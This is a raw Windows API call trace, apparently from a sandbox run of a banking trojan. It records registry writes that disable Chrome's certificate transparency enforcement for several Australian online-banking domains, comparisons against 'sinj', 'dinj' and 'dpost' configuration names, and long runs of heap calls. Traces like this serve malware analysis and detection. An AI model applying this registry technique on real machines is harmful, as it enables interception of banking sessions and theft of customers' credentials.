	[0193.123] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x7fc, lpdwDisposition=0x0) returned 0x0
	[0193.123] RegSetValueExA (in: hKey=0x7fc, lpValueName="355", Reserved=0x0, dwType=0x1, lpData="www1.my.commbiz.commbank.com.au", cbData=0x1f | out: lpData="www1.my.commbiz.commbank.com.au") returned 0x0
	[0193.124] RegCloseKey (hKey=0x7fc) returned 0x0
	[0193.124] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7f8) returned 0x0
	[0193.124] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x804, lpdwDisposition=0x0) returned 0x0
	[0193.124] RegSetValueExA (in: hKey=0x804, lpValueName="356", Reserved=0x0, dwType=0x1, lpData="banking.westpac.com.au", cbData=0x16 | out: lpData="banking.westpac.com.au") returned 0x0
	[0193.125] RegCloseKey (hKey=0x804) returned 0x0
	[0193.125] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x7fc) returned 0x0
	[0193.125] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x808, lpdwDisposition=0x0) returned 0x0
	[0193.125] RegSetValueExA (in: hKey=0x808, lpValueName="357", Reserved=0x0, dwType=0x1, lpData="ibs.bankwest.com.au", cbData=0x13 | out: lpData="ibs.bankwest.com.au") returned 0x0
	[0193.126] RegCloseKey (hKey=0x808) returned 0x0
	[0193.126] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x804) returned 0x0
	[0193.126] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x80c, lpdwDisposition=0x0) returned 0x0
	[0193.126] RegSetValueExA (in: hKey=0x80c, lpValueName="358", Reserved=0x0, dwType=0x1, lpData="online.corp.westpac.com.au", cbData=0x1a | out: lpData="online.corp.westpac.com.au") returned 0x0
	[0193.127] RegCloseKey (hKey=0x80c) returned 0x0
	[0193.128] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", ulOptions=0x0, samDesired=0x20006, phkResult=0x1df73c | out: phkResult=0x1df73c*=0x808) returned 0x0
	[0193.128] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Google\\Chrome\\CertificateTransparencyEnforcementDisabledForUrls", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1df73c, lpdwDisposition=0x0 | out: phkResult=0x1df73c*=0x810, lpdwDisposition=0x0) returned 0x0
	[0193.128] RegSetValueExA (in: hKey=0x810, lpValueName="359", Reserved=0x0, dwType=0x1, lpData="bbo.bankofmelbourne.com.au", cbData=0x1a | out: lpData="bbo.bankofmelbourne.com.au") returned 0x0
	[0193.129] RegCloseKey (hKey=0x810) returned 0x0
	[0193.289] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0194.023] lstrcmpA (lpString1="sinj", lpString2="dpost") returned 1
	[0194.023] lstrcmpA (lpString1="dinj", lpString2="dpost") returned -1
	[0194.023] lstrcmpA (lpString1="dpost", lpString2="dpost") returned 0
	[0194.023] GetProcessHeap () returned 0x260000
	[0194.023] HeapValidate (hHeap=0x260000, dwFlags=0x0, lpMem=0x0) returned 1
	[0194.023] GetProcessHeap () returned 0x260000
	[0194.023] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x260000) returned 1
	[0194.023] GetProcessHeap () returned 0x260000
	[0194.023] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2eb) returned 0x117e470
	[0194.023] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x2f0) returned 0x11be4a0
	[0194.023] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x2f0) returned 0x1197430
	[0194.023] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191f10
	[0194.023] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4c38
	[0194.023] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191f10 | out: hHeap=0x260000) returned 1
	[0194.023] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x27e078
	[0194.023] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x1191f10
	[0194.023] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4c60
	[0194.023] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11d4c60 | out: hHeap=0x260000) returned 1
	[0194.023] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x35f418
	[0194.023] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x27e078 | out: hHeap=0x260000) returned 1
	[0194.023] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4c60
	[0194.023] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4c88
	[0194.023] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11d4c88 | out: hHeap=0x260000) returned 1
	[0194.023] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x48) returned 0x277bc0
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f418 | out: hHeap=0x260000) returned 1
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4c88
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4cb0
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11d4cb0 | out: hHeap=0x260000) returned 1
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x1183298
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x277bc0 | out: hHeap=0x260000) returned 1
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4cb0
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4cd8
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11d4cd8 | out: hHeap=0x260000) returned 1
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x90) returned 0x33c168
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1183298 | out: hHeap=0x260000) returned 1
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4cd8
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4d00
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11d4d00 | out: hHeap=0x260000) returned 1
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4d00
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4d28
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11d4d28 | out: hHeap=0x260000) returned 1
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xd8) returned 0x1179ad0
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33c168 | out: hHeap=0x260000) returned 1
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4d28
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4d50
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11d4d50 | out: hHeap=0x260000) returned 1
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4d50
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4d78
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11d4d78 | out: hHeap=0x260000) returned 1
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4d78
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4da0
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11d4da0 | out: hHeap=0x260000) returned 1
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x138) returned 0x340760
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1179ad0 | out: hHeap=0x260000) returned 1
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4da0
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4dc8
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11d4dc8 | out: hHeap=0x260000) returned 1
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4dc8
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4df0
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11d4df0 | out: hHeap=0x260000) returned 1
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4df0
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4e18
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11d4e18 | out: hHeap=0x260000) returned 1
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4e18
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4e40
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11d4e40 | out: hHeap=0x260000) returned 1
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c8) returned 0x3282e0
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x340760 | out: hHeap=0x260000) returned 1
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4e40
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4e68
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11d4e68 | out: hHeap=0x260000) returned 1
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4e68
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4e90
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11d4e90 | out: hHeap=0x260000) returned 1
	[0194.024] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x11d4e90
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11d4c38 | out: hHeap=0x260000) returned 1
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1197430 | out: hHeap=0x260000) returned 1
	[0194.024] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11be4a0 | out: hHeap=0x260000) returned 1
	[0194.024] ResetEvent (hEvent=0x8) returned 1
	[0194.025] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0250.515] lstrcmpA (lpString1="sinj", lpString2="dinj") returned 1
	[0250.515] lstrcmpA (lpString1="dinj", lpString2="dinj") returned 0
	[0250.515] GetProcessHeap () returned 0x260000
	[0250.515] HeapValidate (hHeap=0x260000, dwFlags=0x0, lpMem=0x2a0f88) returned 1
	[0250.515] GetProcessHeap () returned 0x260000
	[0250.515] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2a0f88 | out: hHeap=0x260000) returned 1
	[0250.515] GetProcessHeap () returned 0x260000
	[0250.515] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2056c) returned 0x2a0f88
	[0250.534] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0253.318] lstrcmpA (lpString1="sinj", lpString2="sinj") returned 0
	[0253.318] GetProcessHeap () returned 0x260000
	[0253.318] HeapValidate (hHeap=0x260000, dwFlags=0x0, lpMem=0x2c1500) returned 1
	[0253.318] GetProcessHeap () returned 0x260000
	[0253.318] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x2c1500 | out: hHeap=0x260000) returned 1
	[0253.319] GetProcessHeap () returned 0x260000
	[0253.319] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x14d08) returned 0x11fe338
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185a98 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191e20 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1197088 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119c848 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11971d8 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11c0370 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119c0f8 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11c0500 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185a60 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191ec0 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119b938 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119c608 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119b548 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11c0230 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119c770 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11c0460 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x118db30 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191e70 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11a2a28 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119c2f0 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11a2920 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11c01b8 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119c2a8 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11c0190 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185ad0 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191dd0 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119bb58 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119c410 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119c6e0 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119b4a0 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119c218 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119b9a8 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185b08 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191e48 | out: hHeap=0x260000) returned 1
	[0253.320] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119bc78 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119bd50 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119c1d0 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11c00a0 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119bc30 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11c0078 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185bb0 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191d80 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119bbe8 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119c260 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119c530 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bffd8 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119bd08 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11c00c8 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185be8 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191f88 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119b5f0 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119bd98 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119b4d8 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bff88 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119be70 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11c0000 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185b78 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1192050 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119b740 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119c0b0 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119b628 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bff60 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119bcc0 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bffb0 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185fa0 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191f60 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119af60 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119bba0 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119b238 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bff38 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119bf48 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119b778 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185c90 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1191fb0 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119b0b0 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119beb8 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119ae10 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfee8 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119bde0 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119aef0 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x35f568 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11920f0 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfe98 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119be28 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfe70 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfec0 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119bf90 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bff10 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185cc8 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11851b8 | out: hHeap=0x260000) returned 1
	[0253.321] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfda8 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119bf00 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfd80 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfe48 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119c140 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfe20 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185ec0 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1192168 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33af78 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33b6c8 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119c068 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfdf8 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119bfd8 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfdd0 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1185f68 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1192078 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119acf8 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33a9d8 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x119ae80 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfd58 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x33afc0 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x11bfd30 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1194f20 | out: hHeap=0x260000) returned 1
	[0253.322] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x1192118 | out: hHeap=0x260000) returned 1
